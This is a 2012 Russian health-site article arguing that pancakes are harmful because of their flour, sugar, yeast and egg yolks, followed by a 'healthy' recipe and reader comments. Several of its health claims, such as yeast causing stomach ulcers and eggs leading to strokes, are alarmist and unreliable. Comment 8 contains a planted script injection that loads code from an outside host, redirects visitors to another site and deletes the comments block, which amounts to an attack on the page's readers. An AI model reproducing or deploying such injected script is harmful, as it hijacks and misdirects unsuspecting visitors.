Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Продукт-обманщик: блины  >>  Продукт-обманщик: блины
 
Обратная связь
 

Продукт-обманщик: блины

Размер шрифта
16 марта 2012 10:00
  • google_analytics: false
  • Нравится

Сахар и мука – основные ингредиенты блинов – могут нанести серьезный вред организму. Если знать свойства этих ингредиентов, то можно свести к минимуму все недостатки блюда. Как правильно приготовить блины?

1 

Состав блинов


  1. Мука и сахар

Для блинов хозяйки берут белую пшеничную муку высшего сорта и сахар. Оба этих продукта – чистые углеводы.

Чем опасны углеводы? Рафинированные, то есть очищенные, углеводы, не задерживаясь в тонком кишечнике, оказываются в нашей крови в виде глюкозы. Следует немедленная реакция организма, и в кровь выбрасывается большое количество инсулина. Большое количество глюкозы и большое количество инсулина через некоторое время приводят к гипогликемии, то есть резкому снижению уровня сахара в крови. На гипогликемию организм реагирует так: «Я очень голоден! Дай поесть».

Выводы:

  • Продукты из чистых углеводов обладают высоким гликемическим индексом. Скорость удаления глюкозы из крови очень высокая.
  • Мука и сахар, как и другие очищенные углеводы, повышают аппетит.

  1. Дрожжи

Дрожжи – это микроорганизмы, которые поглощая глюкозу, выделяют углекислый газ, разрыхляющий тесто, от чего оно становится пышным.

Дрожжи провоцируют повышенное газообразование. Желудок от большого количества пищи и без того чрезмерно наполнен, а газы еще больше его расширяют. Появляется отрыжка. Сфинктер, т.е. заслонка, закрывающая обратный ход в пищевод, не срабатывает, и пищевые массы вместе с желудочным соком забрасываются в пищевод. Стенки пищевода раздражаются, желудок изъязвляется.


  1. Яйца

Яичные желтки содержат холестерин, который приводит к откладыванию на стенках сосудов жировых отложений, а говоря иначе – атеросклеротических бляшек. Эти отложения, со временем разрастаясь, могут полностью перекрыть сосуд. Образуется тромб. Ситуация может привести к инсульту или инфаркту, в зависимости от того, в сосуде какого органа находятся атеросклеротические бляшки.

Правильные блины

Можно ли приготовить блины, сведя к минимуму их вредные свойства? Да, можно.

1

Рецепт «правильных» блинов

Муку высшего сорта заменяем на муку грубого помола. Сахар и дрожжи добавлять не нужно. Вместо дрожжей легкую пышность тесту придаст обезжиренное молоко или кефир. Соль и масло не используем. Из яиц удаляем желтки. Жарим на керамической сковороде без масла. Начиняем блины припущенными фруктами.


Сюжеты по теме:
Продукт-обманщик: блины

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

16 марта 2012 в 12:52

Цитировать   |   Пожаловаться

в одной из своих передач вы говорили, что яйца не повышают холестерин, если их употреблять не в жареном виде и без сочетания с жиром! Да и сам организм синтезирует холестерин тоже, так говорилось в одной из ваших статей!

2 - Гость

16 марта 2012 в 12:53

Цитировать   |   Пожаловаться

сахар при наличии дрожжей в рецептуре никак не может быть основным компонентом блинов: дрожжи его перерабатывают практически полностью в углекислый газ и воду!

3 - Гость

16 марта 2012 в 12:55

Цитировать   |   Пожаловаться

яиц в составе теста всегда очень мало, максимум 1-2 на 2 литра теста! где ж тут вред?А тем более сейчас пост, все пекут без яиц!

Если блины из дрожжевого теста, то читайте выше, дрожжи усиливают газообразование. 
Если блины из бездрожжевого теста, но с сахаром, то читайте выше - сахар усиливает и без того высокий гликемический индекс продукта. 
Если блины без добавления яиц, и без масла, то осталось заменить муку высшего сорта на муку грубого помола, и мы пришли к выводу этой статьи - постным блинам. 
Спасибо за внимание к нашим материалам. Всего доброго. 

5 - Stariche

04 июля 2012 в 10:05

Цитировать   |   Пожаловаться

В то время когда есть в продаже недорогие цукини или кабачки,  можно большую часть муки заменить ими. Предварительно натереть на тёрке, добавить пару перепелиных яиц, и блины будут безвредными для здоровья и очень вкусными.

Stariche 04 июля 2012 в 10:05
цукини или кабачки,  можно большую часть муки заменить ими.
 Спасибо, вариант отличный - вкусно и полезно!

7 - Гость

27 февраля 2014 в 11:40

Цитировать   |   Пожаловаться

интересно, а сами-то пробовали эту "вкуснятину", по-вашему рецепту??? от таких блинов точно не поправишься, потому что больше 1 вряд ли съешь!

8 - zzzzzz

30 июня 2015 в 23:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.